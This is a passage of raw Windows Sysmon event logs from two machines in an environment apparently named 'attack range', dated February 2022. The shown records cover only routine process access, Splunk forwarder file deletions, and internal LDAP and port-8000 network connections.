11:26:03.663{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.663{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.663{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.663{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.663{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-19CB-6216-7107-000000003802}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.663{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19CB-6216-7107-000000003802}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.665{C8EA50B7-19CB-6216-7107-000000003802}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:04.928{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6F566D07DCC475F9AB42F41418C9D4,SHA256=F8BF9A35A9774E19E65622A52C2DD4CA009D0C90C67857B31A620A690FA831C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:04.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B1394DB9464496557A4F40A4735B0A6,SHA256=E115C7F6D7873C65A6D1235EDFF404F5BBBB2F79747646BD60C640ECE6BA41DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:05.943{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B5747D5AA501B0C086D044C4086266E,SHA256=423151C39487FBE013E6F3299902206DF523BFD8232D1BBB82D88F98D6B9AC59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:05.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=598706CBA14700E5424BA7784C9E069F,SHA256=F23AE9ABBCE4DEA96BD6C7CD5195BE415D0CDF4A1FAE4B9168AD61FBFAD1BD01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:06.959{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B64DFD10CC3617FA156757268899FE8,SHA256=D2B3399B3D95AA9DEBD3857E4A0C48E85E3FB10BF2C11CA3B31947938079CBF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:04.468{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51755-false10.0.1.12-8000- 23542300x8000000000000000223012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:06.246{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6948F2042D3A2EA12D1936EB5E636A1,SHA256=6765596AF65D838F01E9912DA721B429B7D62F552A57FD308475B5EC33175B40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.591{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49589-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.591{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49589-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000299131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:07.961{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB9085C6162928233CEF407ADCCE95E5,SHA256=00D27378260B28EA7CCBD13CA9ED77766C0FAD96FCE288F9503EF5CBC8A75DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:07.262{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D1B9D5CD7EFD616C99060A153FC0744,SHA256=D3D0DD5D854AE3B158E0D0015F8C0EDFF52577BFDBCA4F26D2202FD61E1BAA1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:04.508{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49590-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:08.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2288F54D8F8625329F2F0CEDD531F31F,SHA256=82FE770EC6C0B7863443AD664F3154263A5D902E2DD8D2CDA9FAB431E68724DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:08.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0C804FC7338409E8DE988E8DBA50A1,SHA256=25982C6D75E0A0133F4D4932C11D0F4A060B93B67FBBB23DFD41021C4EBFD904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:09.991{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=724F0CC9BB2C2BEBF78AE0F01BE6C5B5,SHA256=D36F30A17A612D8CD69CF162D490706FE890BB9220100E40967F7EE166D0EBCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:09.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=692F4D96CEE55044C5C9BC1BDFB3A36B,SHA256=1DDB7E26FE22C21D3D28283A1939F056DFC7001B723879F6840D1DD2F2BBD2EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:09.267{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-168MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:10.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3592AE9EE3ACBC25FFB80CCCC56680,SHA256=334F7EB0ABC852462EAD499B0E44230A50C02C5600A3103F4CA6E467D86DB337,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:10.278{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-169MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:09.553{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49591-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:11.012{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE8E80288CC9B92DF9F2FC973C6EE1EA,SHA256=76B46246C6B2D20F85703DE65D59E32AE4CD405634E345EFBDEA802403FA8D2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:09.515{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51756-false10.0.1.12-8000- 23542300x8000000000000000223018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:11.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25D3D1A74D1F01156A0E8B6AD24D690F,SHA256=BBA314A16485CA7DAA881665E668AFE26282629F0DC44BE3D3A90DEE5F6D3D51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:12.308{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27FC7E5D3E83EB3BBE665B33FD97E7F1,SHA256=63E46398ECA587DB894B6C4222D08CEA0298BDE9DE0E325896745DD85C845E21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:12.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977C8E08FD0BCCC015DF0F47F358CF6A,SHA256=FB06ADED9412C34462C76C2E2957899338351E0D5A886D98288E917C8D570D69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:13.324{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4BADA1A1552D628AFFAEBC12F54FD9F,SHA256=C57D7F5DCA2564519B14BD10CE2C6CAB8D546B03A753E3CA6A0FB742CFFD1364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:13.114{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5C1BAB1364F290C2305D75B61A388B4,SHA256=118961172CDCE0D4384FAAECFA758C3B9E9C24E9FDC42C1DEECA4E6421A830FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:14.340{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D68BDEA6508380DE67C0B2BF68C66E,SHA256=CE7DC074FE477D089FAA37D9C832FFB6C56BECFABA38B9173AFC0B8DDC5DFBC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:14.129{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9ACD22B5C3DD2032FC9CCD836587781,SHA256=9BDAD6F230184BEDB1266C7AEE9360C9ABD049D02EF219D265EE25742D453333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:15.355{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA983C5551C30C3158F1C6902C0C017B,SHA256=CAE288A6CE7406BD5D3FDF64F2353B44A90CD364A28B6C1B2777886F6D1FBF8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:15.160{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0E1E16234B4266A6903503B10ABE19B,SHA256=E92A578413EFDE283FAECFC6504006DD90BE6C032D895A115C01AB149EB364F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:16.402{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89114F77B97774895397545DB8D6D339,SHA256=C0F0FDCC69E5329F198C7ACA353B882B1CB020EFD9D864FCB0B201EF5088ED8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:16.175{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D461F64D388F57FE8B0DDBA168F84A7,SHA256=432C8D67F62099E119D78F780FE25A3E11A4428F3638AFD802678DE4AD6C020C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:17.433{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E96E69FDE0145679D2AA195669079E08,SHA256=28328E1067BDC71C39B473060166F57AA6B8B7840E527EFEEB3723ACA4918C70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:17.190{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A6EB28BCCCD41188018DCCFD55D75D6,SHA256=183E367CC2A07A5DE2BCD916610DDFDD1043F6CF0712F23F1164683ED1175F39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:14.562{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51757-false10.0.1.12-8000- 23542300x8000000000000000223027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:18.449{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C901965328E95A6E4AEBF455E43FC5,SHA256=A865DA055B4355B177F4FC5D15FEB2C38D0E352AAB957D1A8E8D5EA00B4D0A78,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:15.553{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 